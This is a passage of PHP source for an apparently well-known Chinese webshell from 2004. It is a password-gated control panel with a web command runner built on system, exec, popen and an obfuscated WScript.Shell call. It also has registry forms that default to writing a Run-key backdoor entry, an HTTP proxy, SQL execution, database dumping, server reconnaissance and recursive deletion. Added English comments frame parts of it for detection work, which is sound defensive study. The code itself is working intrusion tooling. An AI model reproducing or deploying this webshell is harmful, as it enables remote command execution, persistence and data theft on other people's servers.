  $tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
  $tb->makehidden('do','programrun');
  echo "</form>\n";
 }

 echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
 $tb->tdbody('提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.');
 
 // Execution functions offered in the select box; "wscript" is added on Windows only.
 $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');

 $tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>
  <tr class="secondalt">
    <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
 // Dispatch on the request-supplied $execfunc; the posted "command" string is handed to the
 // chosen function unchanged and its output is written into the textarea. The popen branch
 // reads a single chunk of at most 2096 bytes. Any unknown $execfunc value falls back to
 // system(). Request bodies carrying "command=" / "execfunc=" to a .php file are the
 // network-side indicator where POST data is inspected.
 if (!empty($_POST['command'])) {
  if ($execfunc=="system") {
   system($_POST['command']);
  } elseif ($execfunc=="passthru") {
   passthru($_POST['command']);
  } elseif ($execfunc=="exec") {
   $result = exec($_POST['command']);
   echo $result;
  } elseif ($execfunc=="shell_exec") {
   $result=shell_exec($_POST['command']);
   echo $result; 
  } elseif ($execfunc=="popen") {
   $pp = popen($_POST['command'], 'r');
   $read = fread($pp, 2096);
   echo $read;
   pclose($pp);
  } elseif ($execfunc=="wscript") {
   // ProgID and interpreter name are built from string fragments, presumably to avoid plain
   // string signatures; matching should be done after normalising concatenation.
   $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
   $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
   $stdout = $exec->StdOut();
   $stroutput = $stdout->ReadAll();
   echo $stroutput;
  } else {
   system($_POST['command']);
  }
 }
 ?></textarea></td>
  </tr> 
  </form>
</table>
<?php
}//end shell

// action=reg: renders the three registry forms (read / write / delete) whose submit buttons
// trigger the WScript.Shell handlers earlier in the script. The values below are only form
// defaults used when nothing was posted: the Terminal Server TCP PortNumber value for reading
// and a value under ...\CurrentVersion\Run for writing. Writes to Run keys and reads of the
// RDP port by the web server process are both worth alerting on.
elseif ($_GET['action'] == "reg") {
 $action = '?action=reg';
 $regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber';
 $registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
 $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe';
 $delregname = $_POST['delregname'];
 $tb->tableheader();
 $tb->formheader($action,'读取注册表');
 $tb->tdbody('键值: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','读取','','submit'),'center','2','50');
 echo "</form>";

 $tb->formheader($action,'写入注册表');
 // Registry value types offered in the select box.
 $cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ');
 $tb->tdbody('键值: '.$tb->makeinput('writeregname',$registre,'','text','56').' 类型: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' 值:  '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','写入','','submit'),'center','2','50');
 echo "</form>";

 $tb->formheader($action,'删除注册表');
 $tb->tdbody('键值: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','删除','','submit'),'center','2','50');
 echo "</form>";
 $tb->tablefooter();
}//end reg

// action=proxy: renders the "online proxy" form; its "url" field is consumed by the
// file_get_contents() branch near the top of the script and the result is shown in the
// "proxyframe" iframe. The on-page text states that the address recorded on the destination
// host is the one shown (REMOTE_ADDR is printed); since the fetch is made by this server, the
// destination will normally log the web server's own address -- relevant when a compromised
// server turns up as the source of requests in someone else's logs.
elseif ($_GET['action'] == "proxy") {
 $action = '?action=proxy';
 $tb->tableheader();
 $tb->formheader($action,'在线代理','proxyframe');
 $tb->tdbody('<br><ul><li>用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.</li><li>用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.</li><li>用本功能浏览的 URL,在目标主机上留下的IP记录是 : '.$_SERVER['REMOTE_ADDR'].'</li></ul>','left');
 $tb->tdbody('URL: '.$tb->makeinput('url','http://www.4ngel.net','','text','100').' '.$tb->makeinput('','浏览','','submit'),'center','1','40');
 $tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="http://www.4ngel.net"></iframe>');
 echo "</form>";
 $tb->tablefooter();
}//end proxy

// action=sql: renders the SQL form. Host and user default to localhost / root; the posted
// values (including the database password) are echoed back into visible text inputs. The form
// posts do=query.
elseif ($_GET['action'] == "sql") {
 $action = '?action=sql';
 $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
 $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
 $dbpassword = $_POST['dbpassword'];
 $dbname = $_POST['dbname'];
 $sql_query = $_POST['sql_query'];
 $tb->tableheader();
 $tb->formheader($action,'执行 SQL 语句');
 $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));
 $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
 $tb->makehidden('do','query');
 $tb->formfooter('1','30');
}//end sql query

// action=sqlbak: renders the MySQL backup form. It connects with the posted credentials,
// lists the tables of $dbname, and offers two targets: a server-side file (default
// "<script dir>/<Host header>_MySQL.sql") or a direct download. The form posts
// do=backupmysql.
elseif ($_GET['action'] == "sqlbak") {
 $action = '?action=sqlbak';
 $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
 $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
 $dbpassword = $_POST['dbpassword'];
 $dbname = $_POST['dbname'];
 $tb->tableheader();
 $tb->formheader($action,'备份 MySQL 数据库');
 $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));
 @mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
    // Collect table names as both key and value for the multi-select box.
    $tables = @mysql_list_tables($dbname);
    while ($table = @mysql_fetch_row($tables)) {
  $cachetables[$table[0]] = $table[0];
    }
    @mysql_free_result($tables);
 if (empty($cachetables)) {
  $tb->tdbody('<b>您没有连接数据库 or 当前数据库没有任何数据表</b>');
 } else {
  $tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top">请选择表:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> 备份数据所保存的路径:</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download"> 直接下载到本地 (适合数据量较小的数据库)</td></tr></table>');
  $tb->makehidden('do','backupmysql');
  $tb->formfooter('0','30');
 }
 $tb->tablefooter();
 @mysql_close();
}//end sql backup

// action=phpenv: host reconnaissance page. It collects server identity, PHP settings and the
// list of available extensions into $info and prints them in three tables, plus a form
// (do=viewphpvar) for querying a single directive. The settings it reports on --
// disable_functions, allow_url_fopen, enable_dl, safe mode -- are the hardening knobs that
// decide which of the script's other features work.
elseif ($_GET['action'] == "phpenv") {
 $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
 $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
 // Display form of disable_functions: "No" when empty, otherwise one entry per line.
 if ($dis_func == "") {
  $dis_func = "No";
 }else {
  $dis_func = str_replace(" ","<br>",$dis_func);
  $dis_func = str_replace(",","<br>",$dis_func);
 }
 $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
  // Rows 0-12: server identity; 13-24: PHP settings; 25-40: extension availability as
  // reported by getfun() (defined outside the visible code).
  $info = array(
   0  => array("服务器时间",date("Y年m月d日 h:i:s",time())),
   1  => array("服务器域名","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
   2  => array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
   3  => array("服务器操作系统",PHP_OS),
   5  => array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
   6  => array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
   7  => array("Web服务端口",$_SERVER['SERVER_PORT']),
   8  => array("PHP运行方式",strtoupper(php_sapi_name())),
   9  => array("PHP版本",PHP_VERSION),
   10 => array("运行于安全模式",getphpcfg("safemode")),
   11 => array("服务器管理员",$adminmail),
   12 => array("本文件路径",__FILE__),

   13 => array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")),
   14 => array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")),
   15 => array("显示错误信息 display_errors",getphpcfg("display_errors")),
   16 => array("自动定义全局变量 register_globals",getphpcfg("register_globals")),
   17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
   18 => array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")),
   19 => array("POST最大字节数 post_max_size",getphpcfg("post_max_size")),
   20 => array("允许最大上传文件 upload_max_filesize",$upsize),
   21 => array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"),
   22 => array("被禁用的函数 disable_functions",$dis_func),
   23 => array("phpinfo()",$phpinfo),
   24 => array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),

   25 => array("图形处理 GD Library",getfun("imageline")),
   26 => array("IMAP电子邮件系统",getfun("imap_close")),
   27 => array("MySQL数据库",getfun("mysql_close")),
   28 => array("SyBase数据库",getfun("sybase_close")),
   29 => array("Oracle数据库",getfun("ora_close")),
   30 => array("Oracle 8 数据库",getfun("OCILogOff")),
   31 => array("PREL相容语法 PCRE",getfun("preg_match")),
   32 => array("PDF文档支持",getfun("pdf_close")),
   33 => array("Postgre SQL数据库",getfun("pg_close")),
   34 => array("SNMP网络管理协议",getfun("snmpget")),
   35 => array("压缩文件支持(Zlib)",getfun("gzclose")),
   36 => array("XML解析",getfun("xml_set_object")),
   37 => array("FTP",getfun("ftp_login")),
   38 => array("ODBC数据库连接",getfun("odbc_close")),
   39 => array("Session支持",getfun("session_start")),
   40 => array("Socket支持",getfun("fsockopen")),
  );

 $tb->tableheader();
 echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
 $tb->tdbody('<b>查看PHP配置参数状况</b>','left','1','30','style="padding-left: 5px;"');
 $tb->tdbody('请输入配置参数(如:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','查看','','submit'),'left','2','30','style="padding-left: 5px;"');
 $tb->makehidden('do','viewphpvar');
 echo "</form>\n";
 // Section headings for the three tables printed by the loop below.
 $hp = array(0=> '服务器特性', 1=> 'PHP基本特性', 2=> '组件支持状况');
 for ($a=0;$a<3;$a++) {
  $tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
?>
  <tr class="secondalt">
    <td>
      <table width="100%" border="0" cellpadding="0" cellspacing="0">
<?php
  // Pass 0 prints rows 0-12, pass 1 rows 13-24, pass 2 rows 25-40.
  if ($a==0) {
   for($i=0;$i<=12;$i++) {
    echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
   }
  } elseif ($a == 1) {
   for ($i=13;$i<=24;$i++) {
    echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
   }
  } elseif ($a == 2) {
   for ($i=25;$i<=40;$i++) {
    echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
   }
  }
?>
      </table>
    </td>
  </tr>
<?php
 }//for
echo "</table>";
}//end phpenv
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
  <tr>
    <td>Copyright (C) 2004 Security Angel Team [SYUE] All Rights Reserved.</td>
    <td align="right"><?php
 // Print the "Processed in N second(s)" footer, then flush the output buffer opened by
 // ob_start() at the top of the script. The footer text is a fixed string in every page.
 debuginfo();
 ob_end_flush(); 
 ?></td>
  </tr>
</table>
</center>
</body>
</html>

<?php

/*======================================================
函数库
======================================================*/

 // Login entry point.
 // Prints a bare password form (field "adminpass", hidden field do=login) and terminates the
 // request, so nothing after the authentication block runs for an unauthenticated visitor.
 // The response is tiny and has no <html> wrapper: a small page consisting of just this form
 // served from an unexpected .php path is a recognisable content signature.
 function loginpage() {
?>
<style type="text/css">
input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
<input type="hidden" name="do" value="login">
<input type="submit" value="Login">
</form>
<?php
  exit;
 }//end loginpage()

 // Page debug information.
 // Echoes the elapsed time since the global $starttime (set at the top of the script),
 // formatted to six decimals.
 function debuginfo() {
  global $starttime;
  $mtime = explode(' ', microtime());
  $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
  echo "Processed in $totaltime second(s)";
 }

 // Remove escape characters (undo magic_quotes_gpc) from a request array.
 /**
  * Recursively applies stripslashes() to the string values of $array, in place.
  *
  * The keys 'argc' and 'argv' are skipped, and so is any key that is entirely
  * upper-case unless it is an integer-like key.
  *
  * NOTE(review): each() was deprecated in PHP 7.2 and removed in PHP 8.0.
  *
  * @param array $array taken by reference and modified
  * @return array the same array after processing
  */
 function stripslashes_array(&$array) {
  while(list($key,$var) = each($array)) {
   if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
    if (is_string($var)) {
     $array[$key] = stripslashes($var);
    }
    if (is_array($var))  {
     // Nested arrays are handled by recursion.
     $array[$key] = stripslashes_array($var);
    }
   }
  }
  return $array;
 }

 // Delete a directory tree.
 /**
  * Recursively removes $deldir and everything beneath it.
  *
  * Each entry is chmod()'ed to 0777 before it is unlinked or removed, and all
  * failures are silenced with @. On an affected host this appears as a burst of
  * permission changes followed by deletions under one directory, which is
  * worth correlating in file-integrity or audit logs.
  *
  * NOTE(review): the result of @dir() is not checked before ->read() is called.
  *
  * @param string $deldir directory to remove
  * @return int 1 if the final rmdir() succeeded, otherwise 0
  */
 function deltree($deldir) {
  $mydir=@dir($deldir); 
  while($file=$mydir->read()) {   
   if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
    @chmod("$deldir/$file",0777);
    deltree("$deldir/$file");
   }
   if (is_file("$deldir/$file")) {
    @chmod("$deldir/$file",0777);
    @unlink("$deldir/$file");
   }
  }
  $mydir->close();
  @chmod("$deldir",0777);
  return (@rmdir($deldir)) ? 1 : 0;
 }

 // Check whether a directory is writable.
 /**
  * Probes write access by actually writing to disk.
  *
  * Side effects: creates $dir with mode 0777 when it does not exist, then
  * creates and immediately deletes "$dir/test.txt". Both leave filesystem
  * events that file-integrity monitoring can pick up.
  *
  * NOTE(review): $writeable is never assigned when $dir is still not a
  * directory after the mkdir() attempt, so the return value is unset then.
  *
  * @param string $dir directory to probe
  * @return int 1 if the test file could be opened for writing, 0 if not
  */
 function dir_writeable($dir) {
  if (!is_dir($dir)) {
   @mkdir($dir, 0777);
  }
  if(is_dir($dir)) {
   if ($fp = @fopen("$dir/test.txt", 'w')) {
    @fclose($fp);
    @unlink("$dir/test.txt");
    $writeable = 1;
   } else {
    $writeable = 0;
   }
  }
  return $writeable;
 }

 // 表格行间的背景色替换
 function getrowbg() {
  global $bgcounter;
  if ($bgcounter++%2==0) {
   return "firstalt";
  } else {
   return "secondalt";
  }
 }

 // 获取当前的文件系统路径
 function getPath($mainpath, $relativepath) {
  global $dir;
  $mainpath_info           = explode('/', $mainpath);
  $relativepath_info       = explode('/', $relativepath);
  $relativepath_info_count = count($relativepath_info);
  for ($i=0; $i<$relativepath_info_count; $i++) {
   if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
   if ($relativepath_info[$i] == '..') {
    $mainpath_info_count = count($mainpath_info);
    unset($mainpath_info[$mainpath_info_count-1]);
    continue;
   }
   $mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
  } //end for
  return implode('/', $mainpath_info);
 }

 // 检查PHP配置参数
 function getphpcfg($varname) {
  switch($result = get_cfg_var($varname)) {
   case 0:
   return "No";
   break;
   case 1:
   return "Yes";
   break;
   default:
   return $result;
   break;
  }
 }

 // 检查函数情况
 function getfun($funName) {
  return (false !== function_exists($funName)) ? "Yes" : "No";
 }

 // Archive (zip) packing class.
 /**
  * Minimal in-memory ZIP writer used to bundle files read from disk.
  *
  * Constructing it with a directory path (or an array of file names) reads
  * every listed regular file and leaves the finished archive bytes in $out.
  *
  * NOTE(review): the constructor is PHP 4 style (a method named after the
  * class); PHP 8 no longer treats such a method as a constructor.
  */
 class PHPZip{
 // Finished archive bytes; stays '' when nothing was packed.
 var $out='';
  /**
   * Packs $dir (a directory path, or an array of file paths) into $out.
   *
   * Does nothing and returns 0 when gzcompress() is unavailable. The working
   * directory is changed to $dir while reading and restored afterwards.
   */
  function PHPZip($dir) {
      if (@function_exists('gzcompress')) {
    $curdir = getcwd();
    if (is_array($dir)) $filelist = $dir;
          else{
           $filelist=$this -> GetFileList($dir);//file list
        // Appends a copy of each entry with the "$dir/" prefix cut off; the
        // original entries stay in the list as well.
        foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
             }
          if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
    else chdir($curdir);
    if (count($filelist)>0){
     foreach($filelist as $filename){
      if (is_file($filename)){
       // Whole file is read into memory; a failed read is silenced with @.
       $fd = fopen ($filename, "r");
       $content = @fread ($fd, filesize ($filename));
       fclose ($fd);
          // For an explicit file list only the base name is stored in the archive.
          if (is_array($dir)) $filename = basename($filename);
       $this -> addFile($content, $filename);
      }
     }
     $this->out = $this -> file();
     chdir($curdir);
    }
    return 1;
   }
   else return 0;
  }

  // Collect the list of files under the given directory.
  // Recurses into sub-directories; directories themselves are listed too.
  // NOTE(review): $a is a static local, so results accumulate across calls
  // and are never reset within one request.
  function GetFileList($dir){
   static $a;
   if (is_dir($dir)) {
    if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== false) {
      if($file!='.' && $file!='..'){
                $f=$dir .'/'. $file;
                if(is_dir($f)) $this->GetFileList($f);
       $a[]=$f;
            }
     }
         closedir($dh);
       }
   }
   return $a;
  }

  // Local file records, one string per added file.
  var $datasec      = array();
     // Central directory records, one string per added file.
     var $ctrl_dir     = array();
  // End-of-central-directory signature followed by two zeroed 16-bit fields.
  var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
     // Byte offset at which the next local file record will start.
     var $old_offset   = 0;

  // Converts a Unix timestamp (0 = now) to the packed 32-bit DOS date/time
  // used by ZIP; dates before 1980 are clamped to 1980-01-01 00:00:00.
  function unix2DosTime($unixtime = 0) {
         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
      if ($timearray['year'] < 1980) {
    $timearray['year']    = 1980;
          $timearray['mon']     = 1;
          $timearray['mday']    = 1;
       $timearray['hours']   = 0;
    $timearray['minutes'] = 0;
          $timearray['seconds'] = 0;
         } // end if
      return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
           ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
     }

  /**
   * Adds one file to the archive being built.
   *
   * Appends a local file record to $datasec and the matching central
   * directory record to $ctrl_dir.
   *
   * @param string $data file contents
   * @param string $name path stored in the archive (backslashes become '/')
   * @param int    $time Unix timestamp for the entry, 0 meaning "now"
   */
  function addFile($data, $name, $time = 0) {
         $name     = str_replace('\\', '/', $name);

      // Turn the DOS time into four little-endian bytes. The eval() input is
      // built only from the hex digits dechex() returned, not from request
      // data; static scanners will still flag the eval() call itself.
      $dtime    = dechex($this->unix2DosTime($time));
         $hexdtime = '\x' . $dtime[6] . $dtime[7]
                . '\x' . $dtime[4] . $dtime[5]
             . '\x' . $dtime[2] . $dtime[3]
          . '\x' . $dtime[0] . $dtime[1];
         eval('$hexdtime = "' . $hexdtime . '";');
      // Local file header: signature, version needed, flags, method 8 (deflate).
      $fr   = "\x50\x4b\x03\x04";
   $fr   .= "\x14\x00";
         $fr   .= "\x00\x00";
      $fr   .= "\x08\x00";
   $fr   .= $hexdtime;

         $unc_len = strlen($data);
      $crc     = crc32($data);
   $zdata   = gzcompress($data);
         // NOTE(review): the length is taken before the trimming on the next
         // line, so the stored compressed size is 6 bytes larger than the
         // data actually written.
         $c_len   = strlen($zdata);
      // Drop the first 2 and last 4 bytes of the gzcompress() output.
      $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
   $fr      .= pack('V', $crc);
         $fr      .= pack('V', $c_len);
      $fr      .= pack('V', $unc_len);
   $fr      .= pack('v', strlen($name));
         $fr      .= pack('v', 0);
      $fr      .= $name;

   $fr .= $zdata;

         // CRC and both sizes are repeated after the compressed data.
         $fr .= pack('V', $crc);
      $fr .= pack('V', $c_len);
   $fr .= pack('V', $unc_len);

         $this -> datasec[] = $fr;
      $new_offset        = strlen(implode('', $this->datasec));

   // Central directory record for the same file.
   $cdrec = "\x50\x4b\x01\x02";
         $cdrec .= "\x00\x00";
      $cdrec .= "\x14\x00";
   $cdrec .= "\x00\x00";
         $cdrec .= "\x08\x00";
      $cdrec .= $hexdtime;
   $cdrec .= pack('V', $crc);
         $cdrec .= pack('V', $c_len);
      $cdrec .= pack('V', $unc_len);
   $cdrec .= pack('v', strlen($name) );
         $cdrec .= pack('v', 0 );
      $cdrec .= pack('v', 0 );
   $cdrec .= pack('v', 0 );
         $cdrec .= pack('v', 0 );
      $cdrec .= pack('V', 32 );
   // Offset of this file's local record, then remember where the next one starts.
   $cdrec .= pack('V', $this -> old_offset );
         $this -> old_offset = $new_offset;
      $cdrec .= $name;

   $this -> ctrl_dir[] = $cdrec;
     }

  // Returns the complete archive: all local records, the central directory,
  // then the end record (entry count twice, directory size, directory offset,
  // zero-length comment).
  function file() {
   $data    = implode('', $this -> datasec);
         $ctrldir = implode('', $this -> ctrl_dir);
      return
       $data .
    $ctrldir .
             $this -> eof_ctrl_dir .
          pack('v', sizeof($this -> ctrl_dir)) .
       pack('v', sizeof($this -> ctrl_dir)) .
    pack('V', strlen($ctrldir)) .
             pack('V', strlen($data)) .
          "\x00\x00";
     }
 }

 // Back up (dump) a database table.
 /**
  * Writes a SQL dump of one table: DROP/CREATE statements followed by one
  * INSERT per row.
  *
  * Runs on the current default connection of the legacy mysql_* extension
  * (removed in PHP 7.0). $table is interpolated into every statement without
  * quoting. A dump written through $fp into a web-reachable directory is the
  * artifact to look for when assessing what data left the host.
  *
  * @param string   $table table name
  * @param resource $fp    open file handle to write to; when 0 the dump is echoed
  */
 function sqldumptable($table, $fp=0) {
  $tabledump = "DROP TABLE IF EXISTS $table;\n";
  $tabledump .= "CREATE TABLE $table (\n";

  $firstfield=1;

  // Column definitions, rebuilt from SHOW FIELDS.
  $fields = mysql_query("SHOW FIELDS FROM $table");
  while ($field = mysql_fetch_array($fields)) {
   if (!$firstfield) {
    $tabledump .= ",\n";
   } else {
    $firstfield=0;
   }
   $tabledump .= "   $field[Field] $field[Type]";
   // empty() also skips defaults such as "0", so those are not reproduced.
   if (!empty($field["Default"])) {
    $tabledump .= " DEFAULT '$field[Default]'";
   }
   if ($field['Null'] != "YES") {
    $tabledump .= " NOT NULL";
   }
   if ($field['Extra'] != "") {
    $tabledump .= " $field[Extra]";
   }
  }
  mysql_free_result($fields);
 
  // Group index columns by key name; unique keys get a "UNIQUE|" prefix.
  $keys = mysql_query("SHOW KEYS FROM $table");
  while ($key = mysql_fetch_array($keys)) {
   $kname=$key['Key_name'];
   if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
    $kname="UNIQUE|$kname";
   }
   if(!is_array($index[$kname])) {
    $index[$kname] = array();
   }
   $index[$kname][] = $key['Column_name'];
  }
  mysql_free_result($keys);

  // NOTE(review): each() was removed in PHP 8.0, and implode() is called with
  // the legacy (array, separator) argument order.
  while(list($kname, $columns) = @each($index)) {
   $tabledump .= ",\n";
   $colnames=implode($columns,",");

   if ($kname == "PRIMARY") {
    $tabledump .= "   PRIMARY KEY ($colnames)";
   } else {
    // The "UNIQUE|" prefix is stripped and the key is emitted as a plain KEY.
    if (substr($kname,0,6) == "UNIQUE") {
     $kname=substr($kname,7);
    }
    $tabledump .= "   KEY $kname ($colnames)";
   }
  }

  $tabledump .= "\n);\n\n";
  if ($fp) {
   fwrite($fp,$tabledump);
  } else {
   echo $tabledump;
  }

  // Row data: the whole table is selected and written one INSERT at a time.
  $rows = mysql_query("SELECT * FROM $table");
  $numfields = mysql_num_fields($rows);
  while ($row = mysql_fetch_array($rows)) {
   $tabledump = "INSERT INTO $table VALUES(";

   $fieldcounter=-1;
   $firstfield=1;
   while (++$fieldcounter<$numfields) {
    if (!$firstfield) {
     $tabledump.=", ";
    } else {
     $firstfield=0;
    }

    if (!isset($row[$fieldcounter])) {
     $tabledump .= "NULL";
    } else {
     $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
    }
   }

   $tabledump .= ");\n";

   if ($fp) {
    fwrite($fp,$tabledump);
   } else {
    echo $tabledump;
   }
  }
  mysql_free_result($rows);
 }

 /**
  * HTML table and form builder for the panel pages.
  *
  * Every argument is concatenated into the markup as-is; nothing is passed
  * through htmlspecialchars(). Methods either echo their markup or return it
  * as a string, as noted on each one.
  *
  * NOTE(review): array keys are written as bare words ($arg[enctype]); outside
  * a quoted string that is an undefined-constant lookup, which raises a notice
  * on older PHP and an Error on PHP 8.
  */
 class FORMS {
  // Echoes the opening tag of the 775px layout table.
  function tableheader() {
   echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
  }

  // Echoes a complete one-row form. Recognised keys of $arg: enctype, method
  // (default "POST"), action (default ''), content (the cell body).
  function headerform($arg=array()) {
   global $dir;
   if ($arg[enctype]){
    $enctype="enctype=\"$arg[enctype]\"";
   } else {
    $enctype="";
   }
   if (!isset($arg[method])) {
    $arg[method] = "POST";
   }
   if (!isset($arg[action])) {
    $arg[action] = '';
   }
   echo "  <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
   echo "  <tr>\n";
   echo "    <td>".$arg[content]."</td>\n";
   echo "  </tr>\n";
   echo "  </form>\n";
  }

  // Echoes a title row with a "back" link to ?dir=<global $dir, URL-encoded>.
  function tdheader($title) {
   global $dir;
   echo "  <tr class=\"firstalt\">\n";
   echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">返回</a>]</b></td>\n";
   echo "  </tr>\n";
  }

  // Echoes one table row. $bgcolor '2' / '1' select the "secondalt" /
  // "firstalt" class; any other value is used as the class name itself.
  function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
   if ($bgcolor=='2') {
    $css="secondalt";
   } elseif ($bgcolor=='1') {
    $css="firstalt";
   } else {
    $css=$bgcolor;
   }
   $height = empty($height) ? "" : " height=".$height;
   $colspan = empty($colspan) ? "" : " colspan=".$colspan;
   echo "  <tr class=\"".$css."\">\n";
   echo " <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
   echo "  </tr>\n";
  }

  // Echoes the closing table tag.
  function tablefooter() {
   echo "</table>\n";
  }

  // Echoes an opening POST form plus a title row with a "back" link.
  // NOTE(review): the optional $action precedes the required $title.
  function formheader($action='',$title,$target='') {
   global $dir;
   $target = empty($target) ? "" : " target=\"".$target."\"";
   echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
   echo "  <tr class=\"firstalt\">\n";
